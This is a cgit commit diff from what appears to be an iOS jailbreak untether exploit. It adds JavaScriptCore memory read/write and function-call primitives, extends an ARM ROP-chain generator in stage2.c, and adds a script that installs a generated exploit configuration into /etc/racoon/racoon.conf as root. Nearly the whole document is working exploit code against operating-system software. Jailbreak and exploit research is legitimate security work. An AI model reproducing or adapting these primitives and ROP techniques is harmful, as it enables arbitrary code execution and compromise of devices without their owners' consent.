summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--.gitignore4
-rwxr-xr-xbuild.sh5
-rwxr-xr-xinstall_native.sh14
-rw-r--r--js/call.js11
-rw-r--r--js/main.js15
-rw-r--r--js/mem.js8
-rw-r--r--old_exp.conf1
-rw-r--r--src/main.c4
-rw-r--r--src/stage2.c24
9 files changed, 68 insertions, 18 deletions
diff --git a/.gitignore b/.gitignore
index e587f6c..94d6152 100644
--- a/.gitignore
+++ b/.gitignore
@@ -11,4 +11,6 @@ usedbins/*
exp.js
*/exp.js
-**/exp.js \ No newline at end of file
+**/exp.js
+
+racoon.conf
diff --git a/build.sh b/build.sh
index 03fbe43..3bd3809 100755
--- a/build.sh
+++ b/build.sh
@@ -16,7 +16,8 @@ clang -I $(pwd)/inc/ \
-o bin/main \
-D__WHOAMI__="\"$(whoami)\"" \
-D__PWD__="\"$(pwd)\"" \
- -g
+ -g
+# -rdynamic
# build armv7 (for untether install)
xcrun -sdk iphoneos clang -arch armv7 src/main.c \
@@ -32,4 +33,4 @@ xcrun -sdk iphoneos clang -arch armv7 src/main.c \
-framework JavaScriptCore \
-g
-ldid -Sent.xml bin/main_arm \ No newline at end of file
+ldid -Sent.xml bin/main_arm
diff --git a/install_native.sh b/install_native.sh
new file mode 100755
index 0000000..325515a
--- /dev/null
+++ b/install_native.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+#ssh root@localhost -p 2222 "rm main_arm"
+
+#scp -P 2222 bin/main_arm root@localhost:main_arm
+#scp -P 2222 exp.js root@localhost:exp.js
+
+bin/main_arm -f /usr/sbin/racoon -j exp.js -o racoon.conf
+cp racoon.conf /etc/racoon/racoon.conf
+
+#bin/main -f ~/racoon -j ../lol.js | ssh root@localhost -p 2222 "cat > /etc/racoon/racoon.conf"
+
+#bin/main -f ~/racoon | ssh root@192.168.1.6 "cat > racoon.conf"
+#bin/main -f ~/racoon | ssh root@192.168.1.6 "cat > /etc/racoon/racoon.conf"
diff --git a/js/call.js b/js/call.js
index 382222c..8c5ad44 100644
--- a/js/call.js
+++ b/js/call.js
@@ -2,6 +2,7 @@ var reserve_addr = 0x1a0000;
var gettimeofday_addy = 0x34d63d3c;
var slide = 0x0;
var base = 0x0;
+//var slid = 0x0;
function get_dyld_shc_slide() {
return read_u32((slide << 12) + reserve_addr + 20);
@@ -45,3 +46,13 @@ function call4arg(addy, r0, r1, r2, r3) {
return (parseInt(Int64.fromDouble(ret)) & 0xffffffff) >>> 0;
}
+
+/*
+ * call with symbol
+ */
+function calls4arg(sym, r0, r1, r2, r3) {
+ var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
+ var shc_slide = read_u32(0x1a0000 + 20 + slid);
+ var addy = call4arg(dlsym_addy + shc_slide, 0xfffffffe, sptr(sym), 0, 0);
+ return call4arg(addy, r0, r1, r2, r3);
+}
diff --git a/js/main.js b/js/main.js
index efb1f5f..b75af4e 100644
--- a/js/main.js
+++ b/js/main.js
@@ -24,6 +24,10 @@ function main() {
slide = get_our_slide();
base = 0x4000 + (slide << 12);
slid = (slide << 12);
+// write_u32(0x144444, slid);
+// return;
+// call(slide);
+// while(true){;;};
// call(0x41424344);
log("slide=0x" + slide.toString(16));
@@ -31,6 +35,7 @@ function main() {
log("*(uint16_t*)base = 0x" + read_u16(base).toString(16));
log("*(uint32_t*)base = 0x" + read_u32(base).toString(16));
+
write_u32(0x144444, 0x69691337);
log("writing to first mapped loc");
@@ -49,7 +54,9 @@ function main() {
var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
var shc_slide = read_u32(0x1a0000 + 20 + slid);
- write_str(0x148000, "get rekt from jsc %d (slide=%x)\0");
+// write_u32(0x144444, dlsym_addy);
+// return;
+ write_str(0x148000, "get rekt from jsc %d (slide=%x)\n\0");
write_str(0x149000, "syslog\0");
write_str(0x14a000, "sleep\0");
// while (true) {
@@ -59,8 +66,10 @@ function main() {
var i = 0;
while (true) {
- call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
- call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
+// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
+// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
+ calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
+ calls4arg("sleep", 1, 0, 0, 0);
i++;
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
}
diff --git a/js/mem.js b/js/mem.js
index c342707..cfa6698 100644
--- a/js/mem.js
+++ b/js/mem.js
@@ -145,3 +145,11 @@ function write_str(addy, s) {
return s;
}
+
+var global_sptr_addy = 0x150000;
+
+function sptr(s) {
+ write_str(global_sptr_addy, s);
+ global_sptr_addy += s.length;
+ return global_sptr_addy - s.length;
+}
diff --git a/old_exp.conf b/old_exp.conf
new file mode 100644
index 0000000..9bf2c20
--- /dev/null
+++ b/old_exp.conf
@@ -0,0 +1 @@
+execute("/usr/sbin/racoon");
diff --git a/src/main.c b/src/main.c
index c3e4077..124affa 100644
--- a/src/main.c
+++ b/src/main.c
@@ -334,7 +334,7 @@ int main(int argc,
"var parent = new Uint8Array(0x100);"
"var child = new Uint8Array(0x100);"
" var fuck = new Array();"
- " for (var i = 0; i < 0x200000; i++) {"
+ " for (var i = 0; i < 0x10000; i++) {"
" fuck[i] = i;"
" }"
" delete fuck;"
@@ -343,7 +343,7 @@ int main(int argc,
strlen("var parent = new Uint8Array(0x100);"
"var child = new Uint8Array(0x100);"
" var fuck = new Array();"
- " for (var i = 0; i < 0x200000; i++) {"
+ " for (var i = 0; i < 0x10000; i++) {"
" fuck[i] = i;"
" }"
" delete fuck;"
diff --git a/src/stage2.c b/src/stage2.c
index 4297e79..8b98a7e 100644
--- a/src/stage2.c
+++ b/src/stage2.c
@@ -230,6 +230,10 @@ uintptr_t get_dyld_shc_sym_addr(char* sym) {
return dlsym(RTLD_DEFAULT, sym) - get_dyld_shc_slide();
}
+uintptr_t get_dyld_shc_sym_addr_jsc(char* sym) {
+ return dlsym(dlopen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_LAZY) , sym) - get_dyld_shc_slide();
+}
+
rop_chain_shit gen_rop_chain(uint32_t base,
uint32_t we_out_here_addr,
uint32_t mov_r0,
@@ -305,11 +309,11 @@ rop_chain_shit gen_rop_chain(uint32_t base,
// uint32_t slid_b0i = 0x2b14000;
- uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr("JSContextGroupCreate");
- uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr("JSGlobalContextCreateInGroup");
- uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr("JSContextGetGlobalObject");
- uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr("JSStringCreateWithUTF8CString");
- uint32_t JSEvaluateScript = get_dyld_shc_sym_addr("JSEvaluateScript");
+ uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr_jsc("JSContextGroupCreate");
+ uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup");
+ uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject");
+ uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString");
+ uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript");
uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym");
MOV_R0(dlsym_);
@@ -317,7 +321,7 @@ rop_chain_shit gen_rop_chain(uint32_t base,
// uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday");
-// fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, stime);
+ fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_);
/*
MOV_R0(0);
@@ -384,9 +388,9 @@ rop_chain_shit gen_rop_chain(uint32_t base,
MOV_R1_R0();
PRINT_STILL_HERE();
-// DEREF_IN_R0(0x144444);
-// MOV_R1_R0();
-// CALL_1ARG(base + printf_addr, base + dyld_shc_base_status);
+ DEREF_IN_R0(0x144444);
+ MOV_R1_R0();
+ CALL_1ARG(base + printf_addr, base + dyld_shc_base_status);
// CALL_1ARG(base + printf_addr, 0x109000);
@@ -397,4 +401,4 @@ rop_chain_shit gen_rop_chain(uint32_t base,
chain_b0i->chain_len = chain_len * 4;
return chain_b0i;
-} \ No newline at end of file
+}
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 21:29:42 +0000